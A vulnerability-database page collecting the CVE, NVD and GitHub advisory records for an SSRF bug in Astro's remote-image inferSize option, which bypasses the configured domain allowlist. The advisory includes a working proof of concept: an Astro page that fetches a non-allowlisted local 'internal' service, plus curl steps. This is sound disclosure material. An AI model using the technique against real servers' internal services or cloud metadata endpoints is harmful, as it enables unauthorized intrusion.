Vulnerability-Lookup

CVE-2026-27829 (GCVE-0-2026-27829)

Vulnerability from cvelistv5 – Published: 2026-02-26 00:36 – Updated: 2026-02-26 00:36

Title

Astro is vulnerable to SSRF due to missing allowlist enforcement in remote image inferSize

Summary

Astro is a web framework. In versions 9.0.0 through 9.5.3, a bug in Astro's image pipeline allows bypassing `image.domains` / `image.remotePatterns` restrictions, enabling the server to fetch content from unauthorized remote hosts. Astro provides an `inferSize` option that fetches remote images at render time to determine their dimensions. Remote image fetches are intended to be restricted to domains the site developer has manually authorized (using the `image.domains` or `image.remotePatterns` options). However, when `inferSize` is used, no domain validation is performed — the image is fetched from any host regardless of the configured restrictions. An attacker who can influence the image URL (e.g., via CMS content or user-supplied data) can cause the server to fetch from arbitrary hosts. This allows bypassing `image.domains` / `image.remotePatterns` restrictions to make server-side requests to unauthorized hosts. This includes the risk of server-side request forgery (SSRF) against internal network services and cloud metadata endpoints. Version 9.5.4 fixes the issue.

Severity ?

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

CWE

CWE-918 - Server-Side Request Forgery (SSRF)

Assigner

GitHub_M

References

URL

Tags

	https://github.com/withastro/astro/security/advis…	x_refsource_CONFIRM
	https://github.com/withastro/astro/commit/e01e98b…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	withastro	astro	Affected: >= 9.0.0, < 9.5.4

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "astro",
          "vendor": "withastro",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 9.0.0, \u003c 9.5.4"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Astro is a web framework. In versions 9.0.0 through 9.5.3, a bug in Astro\u0027s image pipeline allows bypassing `image.domains` / `image.remotePatterns` restrictions, enabling the server to fetch content from unauthorized remote hosts. Astro provides an `inferSize` option that fetches remote images at render time to determine their dimensions. Remote image fetches are intended to be restricted to domains the site developer has manually authorized (using the `image.domains` or `image.remotePatterns` options). However, when `inferSize` is used, no domain validation is performed \u2014 the image is fetched from any host regardless of the configured restrictions. An attacker who can influence the image URL (e.g., via CMS content or user-supplied data) can cause the server to fetch from arbitrary hosts. This allows bypassing `image.domains` / `image.remotePatterns` restrictions to make server-side requests to unauthorized hosts. This includes the risk of server-side request forgery (SSRF) against internal network services and cloud metadata endpoints. Version 9.5.4 fixes the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-26T00:36:40.497Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/withastro/astro/security/advisories/GHSA-cj9f-h6r6-4cx2",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/withastro/astro/security/advisories/GHSA-cj9f-h6r6-4cx2"
        },
        {
          "name": "https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9"
        }
      ],
      "source": {
        "advisory": "GHSA-cj9f-h6r6-4cx2",
        "discovery": "UNKNOWN"
      },
      "title": "Astro is vulnerable to SSRF due to missing allowlist enforcement in remote image inferSize"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-27829",
    "datePublished": "2026-02-26T00:36:40.497Z",
    "dateReserved": "2026-02-24T02:32:39.800Z",
    "dateUpdated": "2026-02-26T00:36:40.497Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-27829\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-26T01:16:24.390\",\"lastModified\":\"2026-02-26T01:16:24.390\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Astro is a web framework. In versions 9.0.0 through 9.5.3, a bug in Astro\u0027s image pipeline allows bypassing `image.domains` / `image.remotePatterns` restrictions, enabling the server to fetch content from unauthorized remote hosts. Astro provides an `inferSize` option that fetches remote images at render time to determine their dimensions. Remote image fetches are intended to be restricted to domains the site developer has manually authorized (using the `image.domains` or `image.remotePatterns` options). However, when `inferSize` is used, no domain validation is performed \u2014 the image is fetched from any host regardless of the configured restrictions. An attacker who can influence the image URL (e.g., via CMS content or user-supplied data) can cause the server to fetch from arbitrary hosts. This allows bypassing `image.domains` / `image.remotePatterns` restrictions to make server-side requests to unauthorized hosts. This includes the risk of server-side request forgery (SSRF) against internal network services and cloud metadata endpoints. Version 9.5.4 fixes the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":2.5}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"references\":[{\"url\":\"https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/withastro/astro/security/advisories/GHSA-cj9f-h6r6-4cx2\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

FKIE_CVE-2026-27829

Vulnerability from fkie_nvd - Published: 2026-02-26 01:16 - Updated: 2026-02-26 01:16

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9
	security-advisories@github.com	https://github.com/withastro/astro/security/advisories/GHSA-cj9f-h6r6-4cx2

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Astro is a web framework. In versions 9.0.0 through 9.5.3, a bug in Astro\u0027s image pipeline allows bypassing `image.domains` / `image.remotePatterns` restrictions, enabling the server to fetch content from unauthorized remote hosts. Astro provides an `inferSize` option that fetches remote images at render time to determine their dimensions. Remote image fetches are intended to be restricted to domains the site developer has manually authorized (using the `image.domains` or `image.remotePatterns` options). However, when `inferSize` is used, no domain validation is performed \u2014 the image is fetched from any host regardless of the configured restrictions. An attacker who can influence the image URL (e.g., via CMS content or user-supplied data) can cause the server to fetch from arbitrary hosts. This allows bypassing `image.domains` / `image.remotePatterns` restrictions to make server-side requests to unauthorized hosts. This includes the risk of server-side request forgery (SSRF) against internal network services and cloud metadata endpoints. Version 9.5.4 fixes the issue."
    }
  ],
  "id": "CVE-2026-27829",
  "lastModified": "2026-02-26T01:16:24.390",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 2.5,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-02-26T01:16:24.390",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/withastro/astro/security/advisories/GHSA-cj9f-h6r6-4cx2"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-CJ9F-H6R6-4CX2

Vulnerability from github – Published: 2026-02-25 18:11 – Updated: 2026-02-25 18:11

Summary

Astro is vulnerable to SSRF due to missing allowlist enforcement in remote image inferSize

Details

Summary

A bug in Astro's image pipeline allows bypassing image.domains / image.remotePatterns restrictions, enabling the server to fetch content from unauthorized remote hosts.

Details

Astro provides an inferSize option that fetches remote images at render time to determine their dimensions. Remote image fetches are intended to be restricted to domains the site developer has manually authorized (using the image.domains or image.remotePatterns options).

However, when inferSize is used, no domain validation is performed — the image is fetched from any host regardless of the configured restrictions. An attacker who can influence the image URL (e.g., via CMS content or user-supplied data) can cause the server to fetch from arbitrary hosts.

PoC

### Setup Create a new Astro project with the following files: `package.json`:

{
  "name": "poc-ssrf-infersize",
  "private": true,
  "scripts": {
    "dev": "astro dev --port 4322",
    "build": "astro build"
  },
  "dependencies": {
    "astro": "5.17.2",
    "@astrojs/node": "9.5.3"
  }
}

`astro.config.mjs` — only `localhost:9000` is authorized:

import { defineConfig } from 'astro/config';
import node from '@astrojs/node';

export default defineConfig({
  output: 'server',
  adapter: node({ mode: 'standalone' }),
  image: {
    remotePatterns: [
      { hostname: 'localhost', port: '9000' }
    ]
  }
});

`internal-service.mjs` — simulates an internal service on a non-allowlisted host (`127.0.0.1:8888`):

import { createServer } from 'node:http';
const GIF = Buffer.from('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==', 'base64');
createServer((req, res) => {
  console.log(`[INTERNAL] Received: ${req.method} ${req.url}`);
  res.writeHead(200, { 'Content-Type': 'image/gif', 'Content-Length': GIF.length });
  res.end(GIF);
}).listen(8888, '127.0.0.1', () => console.log('Internal service on 127.0.0.1:8888'));

`src/pages/test.astro`:

---
import { getImage } from 'astro:assets';

const result = await getImage({
  src: 'http://127.0.0.1:8888/internal-api',
  inferSize: true,
  alt: 'test'
});
---
<html><body>
  <p>Width: {result.options.width}, Height: {result.options.height}</p>
</body></html>

### Steps to reproduce 1. Run `npm install` and start the internal service:

node internal-service.mjs

2. Start the dev server:

npm run dev

3. Request the page:

curl http://localhost:4322/test

4. `internal-service.mjs` logs `Received: GET /internal-api` — the request was sent to `127.0.0.1:8888` despite only `localhost:9000` being in the allowlist.

Impact

Allows bypassing image.domains / image.remotePatterns restrictions to make server-side requests to unauthorized hosts. This includes the risk of server-side request forgery (SSRF) against internal network services and cloud metadata endpoints.

Severity ?

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@astrojs/node"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "9.0.0"
            },
            {
              "fixed": "9.5.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27829"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-25T18:11:47Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nA bug in Astro\u0027s image pipeline allows bypassing `image.domains` / `image.remotePatterns` restrictions, enabling the server to fetch content from unauthorized remote hosts.\n\n## Details\n\nAstro provides an `inferSize` option that fetches remote images at render time to determine their dimensions. Remote image fetches are intended to be restricted to domains the site developer has manually authorized (using the `image.domains` or `image.remotePatterns` options).\n\nHowever, when `inferSize` is used, no domain validation is performed \u2014 the image is fetched from any host regardless of the configured restrictions. An attacker who can influence the image URL (e.g., via CMS content or user-supplied data) can cause the server to fetch from arbitrary hosts.\n\n## PoC\n\n\u003cdetails\u003e\n\n### Setup\n\nCreate a new Astro project with the following files:\n\n`package.json`:\n```json\n{\n  \"name\": \"poc-ssrf-infersize\",\n  \"private\": true,\n  \"scripts\": {\n    \"dev\": \"astro dev --port 4322\",\n    \"build\": \"astro build\"\n  },\n  \"dependencies\": {\n    \"astro\": \"5.17.2\",\n    \"@astrojs/node\": \"9.5.3\"\n  }\n}\n```\n\n`astro.config.mjs` \u2014 only `localhost:9000` is authorized:\n```javascript\nimport { defineConfig } from \u0027astro/config\u0027;\nimport node from \u0027@astrojs/node\u0027;\n\nexport default defineConfig({\n  output: \u0027server\u0027,\n  adapter: node({ mode: \u0027standalone\u0027 }),\n  image: {\n    remotePatterns: [\n      { hostname: \u0027localhost\u0027, port: \u00279000\u0027 }\n    ]\n  }\n});\n```\n\n`internal-service.mjs` \u2014 simulates an internal service on a non-allowlisted host (`127.0.0.1:8888`):\n```javascript\nimport { createServer } from \u0027node:http\u0027;\nconst GIF = Buffer.from(\u0027R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==\u0027, \u0027base64\u0027);\ncreateServer((req, res) =\u003e {\n  console.log(`[INTERNAL] Received: ${req.method} ${req.url}`);\n  res.writeHead(200, { \u0027Content-Type\u0027: \u0027image/gif\u0027, \u0027Content-Length\u0027: GIF.length });\n  res.end(GIF);\n}).listen(8888, \u0027127.0.0.1\u0027, () =\u003e console.log(\u0027Internal service on 127.0.0.1:8888\u0027));\n```\n\n`src/pages/test.astro`:\n```astro\n---\nimport { getImage } from \u0027astro:assets\u0027;\n\nconst result = await getImage({\n  src: \u0027http://127.0.0.1:8888/internal-api\u0027,\n  inferSize: true,\n  alt: \u0027test\u0027\n});\n---\n\u003chtml\u003e\u003cbody\u003e\n  \u003cp\u003eWidth: {result.options.width}, Height: {result.options.height}\u003c/p\u003e\n\u003c/body\u003e\u003c/html\u003e\n```\n\n### Steps to reproduce\n\n1. Run `npm install` and start the internal service:\n\n```bash\nnode internal-service.mjs\n```\n\n2. Start the dev server:\n\n```bash\nnpm run dev\n```\n\n3. Request the page:\n\n```bash\ncurl http://localhost:4322/test\n```\n\n4. `internal-service.mjs` logs `Received: GET /internal-api` \u2014 the request was sent to `127.0.0.1:8888` despite only `localhost:9000` being in the allowlist.\n\n\u003c/details\u003e\n\n## Impact\n\nAllows bypassing `image.domains` / `image.remotePatterns` restrictions to make server-side requests to unauthorized hosts. This includes the risk of server-side request forgery (SSRF) against internal network services and cloud metadata endpoints.",
  "id": "GHSA-cj9f-h6r6-4cx2",
  "modified": "2026-02-25T18:11:47Z",
  "published": "2026-02-25T18:11:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/withastro/astro/security/advisories/GHSA-cj9f-h6r6-4cx2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/withastro/astro"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Astro is vulnerable to SSRF due to missing allowlist enforcement in remote image inferSize"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-27829 (GCVE-0-2026-27829)

FKIE_CVE-2026-27829

GHSA-CJ9F-H6R6-4CX2

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature